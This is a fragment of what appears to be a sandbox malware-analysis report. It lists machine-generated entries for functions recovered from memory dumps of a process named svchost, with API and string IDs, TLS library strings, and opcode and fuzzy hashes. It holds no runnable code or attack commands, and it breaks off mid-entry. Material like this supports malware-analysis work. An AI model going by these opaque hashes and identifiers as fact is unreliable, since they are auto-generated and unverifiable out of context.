                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$Handshake done
                                                                                              • API String ID: 1322637139-3908905225
                                                                                              • Opcode ID: 773119932e0814d6e5d3013704d7a313269f5b9c811261945f28ea59a9917dc6
                                                                                              • Instruction ID: fd03efcf613e3578733f5a7e528840e4bcdcca82b0204bd0a56beebba43678f2
                                                                                              • Opcode Fuzzy Hash: 773119932e0814d6e5d3013704d7a313269f5b9c811261945f28ea59a9917dc6
                                                                                              • Instruction Fuzzy Hash: A7F01CE1E4A24241FE2AA735E4613FD13909F457A4F449436DE6D465A2DE3CE4C68200
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts
                                                                                              • String ID: <unexpected trailing frame data skipped>$Padding
                                                                                              • API String ID: 1322637139-3812551105
                                                                                              • Opcode ID: 8fcc33ccdfee8de1e13c02cb3314ec5b2480997141a2a5f25eeb24d604b6c0f9
                                                                                              • Instruction ID: 36079d2728a47e3160643cfcef41cb954b7f955ec0c99fce5c775637c0e374df
                                                                                              • Opcode Fuzzy Hash: 8fcc33ccdfee8de1e13c02cb3314ec5b2480997141a2a5f25eeb24d604b6c0f9
                                                                                              • Instruction Fuzzy Hash: 08F01CD1E4A24281FA2AA735E4613BD13509B41794F549036DE2E465B2DE3CE4868201
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ssl\statem\statem_srvr.c$tls_process_end_of_early_data
                                                                                              • API String ID: 1390262125-1059509600
                                                                                              • Opcode ID: 560050212a197dcc58c1741e5c055a236f108b8ce10d7eadae2156d1f2fbc594
                                                                                              • Instruction ID: b3b96355489124dfa70e13ae64ee6f2763c303f46660b3303c66d7fa50f86fc5
                                                                                              • Opcode Fuzzy Hash: 560050212a197dcc58c1741e5c055a236f108b8ce10d7eadae2156d1f2fbc594
                                                                                              • Instruction Fuzzy Hash: D9E0E6B1A1914252E752976AE4924F9A311AFD0740F844432DF2C435B79D68E5858700
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_vset_error
                                                                                              • String ID: ossl_statem_server_pre_work$ssl\statem\statem_srvr.c
                                                                                              • API String ID: 1390262125-3016895475
                                                                                              • Opcode ID: 8cea0a81d003a390121cb4e9fa3ca6797fbe56aa17a0677a7522c174ca79dbb3
                                                                                              • Instruction ID: f44dc74d6c17e418e15b67aa0638e57fadfc873c1b3ecc0d636fb1b63eb7cec5
                                                                                              • Opcode Fuzzy Hash: 8cea0a81d003a390121cb4e9fa3ca6797fbe56aa17a0677a7522c174ca79dbb3
                                                                                              • Instruction Fuzzy Hash: C3D012A1A1A04287E7639772D893AFA1250AF40344F40C835DE2D825B2DE6DE6858740
                                                                                              APIs
                                                                                              • EnterCriticalSection.KERNEL32 ref: 64942789
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 6494279F
                                                                                                • Part of subcall function 64941A20: EnterCriticalSection.KERNEL32 ref: 64941A36
                                                                                                • Part of subcall function 64941A20: LeaveCriticalSection.KERNEL32 ref: 64941A53
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 64942803
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$Leave$Enter
                                                                                              • String ID:
                                                                                              • API String ID: 2978645861-0
                                                                                              • Opcode ID: e6d460741ffd87fbcc524c01911827848854fb32983ebbc26eab718bd315e335
                                                                                              • Instruction ID: 839a74ca1950b2cb207cd67fc0816a519b1457acde348efc587b99345e1d84d6
                                                                                              • Opcode Fuzzy Hash: e6d460741ffd87fbcc524c01911827848854fb32983ebbc26eab718bd315e335
                                                                                              • Instruction Fuzzy Hash: D43146766907408BD7448F36D84079E77A6F78ABDCF188222DE2A87758EF39D096C710
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value
                                                                                              • String ID:
                                                                                              • API String ID: 3702945584-0
                                                                                              • Opcode ID: 84d1d499dd5c580db071729b4aff6c3732617e42b37efa82cf2e3daec4575e8e
                                                                                              • Instruction ID: f54dc3540dcdf39a3e766a566c17badb3a3e851a3ded68f22904b7f3e537b287
                                                                                              • Opcode Fuzzy Hash: 84d1d499dd5c580db071729b4aff6c3732617e42b37efa82cf2e3daec4575e8e
                                                                                              • Instruction Fuzzy Hash: 0521CC22BC611446FF5A9FF5E95037D16566F99BB8F580624CF2D4B3A4FF28C8828B00
                                                                                              APIs
                                                                                              • GetHandleInformation.KERNEL32 ref: 64945F87
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleInformation
                                                                                              • String ID:
                                                                                              • API String ID: 1064748128-0
                                                                                              • Opcode ID: 70f363d5e4adba558b642a658e2de984ee0605ceb2eeecdc855e808291014c40
                                                                                              • Instruction ID: 79745a4ad5391706be20fe4235e8674050c91398eb3db706ed52aa63cfbd30a6
                                                                                              • Opcode Fuzzy Hash: 70f363d5e4adba558b642a658e2de984ee0605ceb2eeecdc855e808291014c40
                                                                                              • Instruction Fuzzy Hash: 9431A0213C150080FB11DF32ED403AA63AAEF94BD8F4445728E1D977A4EF39C986C321
                                                                                              APIs
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 649472DB
                                                                                                • Part of subcall function 649456A0: WaitForSingleObject.KERNEL32 ref: 649456C4
                                                                                              • _errno.MSVCRT ref: 6494733E
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 6494735B
                                                                                              • _errno.MSVCRT ref: 649473B8
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$FileSystem_errno$ObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 619567339-0
                                                                                              • Opcode ID: c903c4d7f9b72e94d93dbc11975c71b78c8edad599be5a2c54c4313e5523792b
                                                                                              • Instruction ID: 583b08ec4c6ea9d136f58fd54912cdfbde6537a34a37690e72838d8498947f60
                                                                                              • Opcode Fuzzy Hash: c903c4d7f9b72e94d93dbc11975c71b78c8edad599be5a2c54c4313e5523792b
                                                                                              • Instruction Fuzzy Hash: 4221EAB279464987DF1DEF39FD042596267A795BE4F58C231EE094BB98EA38C4418310
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: B_exCalc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                              • String ID:
                                                                                              • API String ID: 1900010111-0
                                                                                              • Opcode ID: 33580f98e1a4f0ee6f9f21e2b1bf04ba9079198bb15dc907ab785c7963e00336
                                                                                              • Instruction ID: 9da546a4ba6168ca75062ff0acf2c9da345b2fd263a70238d6bb7dd5218d1736
                                                                                              • Opcode Fuzzy Hash: 33580f98e1a4f0ee6f9f21e2b1bf04ba9079198bb15dc907ab785c7963e00336
                                                                                              • Instruction Fuzzy Hash: 4E41627671AA8286EBA58F36D4603AD73A0FB44B88F488035DE5D9B7A5DF3CD458C700
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Handle$Close$InformationObjectSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 135186658-0
                                                                                              • Opcode ID: c30ba9446f7f4fa1be5e53161ebeb563100884b9ac3cb260c09908a3213b95ff
                                                                                              • Instruction ID: 3b7f193e5d864bfd26511a8a9e44dec223bbdd41615677f5d40ebcd1d534f3ba
                                                                                              • Opcode Fuzzy Hash: c30ba9446f7f4fa1be5e53161ebeb563100884b9ac3cb260c09908a3213b95ff
                                                                                              • Instruction Fuzzy Hash: 4221DE7238164095EB05CFB2E84835A2369EB94FBCF4482369F2D87798EF34C981C710
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Calc_D_priv_bytes_exL_cleanseN_bin2bn
                                                                                              • String ID:
                                                                                              • API String ID: 2662037904-0
                                                                                              • Opcode ID: be2ce4ad4d8f74981af46178bf6be46a742416030eefa523c97b05687784e7fb
                                                                                              • Instruction ID: bf64ca641ba00d8db433d8a3df5e584199349a3fb8d6692993f97b7180e1377c
                                                                                              • Opcode Fuzzy Hash: be2ce4ad4d8f74981af46178bf6be46a742416030eefa523c97b05687784e7fb
                                                                                              • Instruction Fuzzy Hash: F71170A275AA8582FB61DB35E4A12AE3390FFC8B48F444032EE5D877A5DF2CD545C700
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64944CCD
                                                                                              • GetProcessAffinityMask.KERNEL32 ref: 64944CDC
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64944D12
                                                                                              • SetProcessAffinityMask.KERNEL32 ref: 64944D1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: cb020629db8d9df8f43dbe50ffc33e56ce6b6f70c300bc2b20a6d5ce7658db5c
                                                                                              • Instruction ID: a28e0928b939d3290fc9391eb43c8c4365bbbae0e382f54d2b97f9d83160bf69
                                                                                              • Opcode Fuzzy Hash: cb020629db8d9df8f43dbe50ffc33e56ce6b6f70c300bc2b20a6d5ce7658db5c
                                                                                              • Instruction Fuzzy Hash: BFF0F033780A1456EF264F2AF80039F6395BB88B8CF890134DE8C47360EE3EC556CA10
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System_errno$File
                                                                                              • String ID:
                                                                                              • API String ID: 2046127076-0
                                                                                              • Opcode ID: 865d12a501b8b53ec2b4ffe41e8b0cc87b075d7569cf6ad6906a412f6eef4b1d
                                                                                              • Instruction ID: 9b2965fae3bff372d08399535a378afc7e62826f71c7462fdf77964becce744f
                                                                                              • Opcode Fuzzy Hash: 865d12a501b8b53ec2b4ffe41e8b0cc87b075d7569cf6ad6906a412f6eef4b1d
                                                                                              • Instruction Fuzzy Hash: 670126B139060583DF152F35ED0432BA396BB86B99F058321E92A8ABD4EF3DC4108B10
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2847513785.00007FFBA9DF8000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFBA9CD0000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2847494716.00007FFBA9CD0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 0000001A.00000002.2847513785.00007FFBA9CD1000.00000020.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 0000001A.00000002.2847753443.00007FFBAA01B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 0000001A.00000002.2847870900.00007FFBAA116000.00000008.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 0000001A.00000002.2847889608.00007FFBAA117000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 0000001A.00000002.2847947644.00007FFBAA118000.00000008.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 0000001A.00000002.2847966206.00007FFBAA11A000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 0000001A.00000002.2847985695.00007FFBAA11E000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffba9cd0000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                              • String ID:
                                                                                              • API String ID: 2933794660-0
                                                                                              • Opcode ID: 433c8d796f7dbfaa30b33fdd26296c3a8614dd24921e54f212f1ee0b781c75b1
                                                                                              • Instruction ID: e584f56e44a086628c5fb67a8b54abc25f3d8823dac30fe18adcb0a46716e7aa
                                                                                              • Opcode Fuzzy Hash: 433c8d796f7dbfaa30b33fdd26296c3a8614dd24921e54f212f1ee0b781c75b1
                                                                                              • Instruction Fuzzy Hash: DD118C62B05F02C9EB018B70E8442A837B8FB0A758F440E36DE6D427A4DF38D1668350
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_$E_add_lookupP_ctrl_exR_pop_to_markR_set_mark
                                                                                              • String ID:
                                                                                              • API String ID: 3663983608-0
                                                                                              • Opcode ID: 135ad2358095351e0334d5d2e2c2bc71690ac24f215a49cf4de52d59c4524a4f
                                                                                              • Instruction ID: 99e9d2054135409e487b96de0864a5ba7c9e9db2d6a9d0c39e95da513c5a30be
                                                                                              • Opcode Fuzzy Hash: 135ad2358095351e0334d5d2e2c2bc71690ac24f215a49cf4de52d59c4524a4f
                                                                                              • Instruction Fuzzy Hash: 3EF0A9A2A0A74242EB619775F08175D6350EF88BD4F458131FF5C077AAEE3CD4444704
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrl
                                                                                              • String ID: ssl\s3_msg.c$v
                                                                                              • API String ID: 3605655398-2542064467
                                                                                              • Opcode ID: a4d6dcf6aadac775b40b2e3e810d1e09ce69368ff7b43572e540d2d845c54ad3
                                                                                              • Instruction ID: a2f3f80d947ed4527ec09a6eb240aa8b721ed5499c722204a3ea31476085a170
                                                                                              • Opcode Fuzzy Hash: a4d6dcf6aadac775b40b2e3e810d1e09ce69368ff7b43572e540d2d845c54ad3
                                                                                              • Instruction Fuzzy Hash: 59718372A0968186E761CF35E0417AD77A0FB49B88F184136DFAC87B99DF3DD5848B10
                                                                                              APIs
                                                                                              Strings
                                                                                              • Address %p has no image-section, xrefs: 64947897, 649479E2
                                                                                              • VirtualQuery failed for %d bytes at address %p, xrefs: 649479CC
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmp
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: QueryVirtual
                                                                                              • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                              • API String ID: 1804819252-157664173
                                                                                              • Opcode ID: 58d5ffc90012783a004cf7d7dd8a0b386f8571cb24a0408e1651455e6bf02d4c
                                                                                              • Instruction ID: 8be9da6754a8680321cc1caed793d364adb42589025e39e06b87e8c5ec4e3486
                                                                                              • Opcode Fuzzy Hash: 58d5ffc90012783a004cf7d7dd8a0b386f8571cb24a0408e1651455e6bf02d4c
                                                                                              • Instruction Fuzzy Hash: 2931D177792A4899FB41EF12EC44B56776ABB46BE8F488225DE0C07360EB38C143C310
                                                                                              APIs
                                                                                              • BIO_write_ex.LIBCRYPTO-3-X64(?,00007FFBAB4465AF,?,00007FFBAB4463E5,?,00007FFBAB445FD1,00000000,00007FFBAB446D2C,?,00007FFBAB448458,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB446273
                                                                                                • Part of subcall function 00007FFBAB4461C0: memcpy.VCRUNTIME140(?,00007FFBAB4465AF,?,00007FFBAB4463E5,?,00007FFBAB445FD1,00000000,00007FFBAB446D2C,?,00007FFBAB448458,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB4462B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmp
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_write_exmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 2233345512-399585960
                                                                                              • Opcode ID: 9fe9475822be5c7edd5345edf8b85b0ce9b925777148dcc73a498bc2fa9520ec
                                                                                              • Instruction ID: 1ef0eed9c685755e99a7417c8a031b713200f17df55efa3250a0dc7202862648
                                                                                              • Opcode Fuzzy Hash: 9fe9475822be5c7edd5345edf8b85b0ce9b925777148dcc73a498bc2fa9520ec
                                                                                              • Instruction Fuzzy Hash: ED31B2B2A09B8293E62A9B75E15016EBBA0FB45B80F548075DF9C03B65CF3DE571C300
                                                                                              APIs
                                                                                              • BIO_write_ex.LIBCRYPTO-3-X64(?,00000030,00007FFBAB44685A,00000000,?,?,00007FFBAB446CD8,?,00007FFBAB448467,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB4469D3
                                                                                                • Part of subcall function 00007FFBAB4461C0: BIO_write_ex.LIBCRYPTO-3-X64(?,00007FFBAB4465AF,?,00007FFBAB4463E5,?,00007FFBAB445FD1,00000000,00007FFBAB446D2C,?,00007FFBAB448458,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB446273
                                                                                              • memcpy.VCRUNTIME140(?,00000030,00007FFBAB44685A,00000000,?,?,00007FFBAB446CD8,?,00007FFBAB448467,02000100,00007FFBAB447837,?,00007FFBAB4496C5,02000100,00007FFBAB44E4EE), ref: 00007FFBAB446A12
                                                                                              Strings
                                                                                              Memory Dump Source
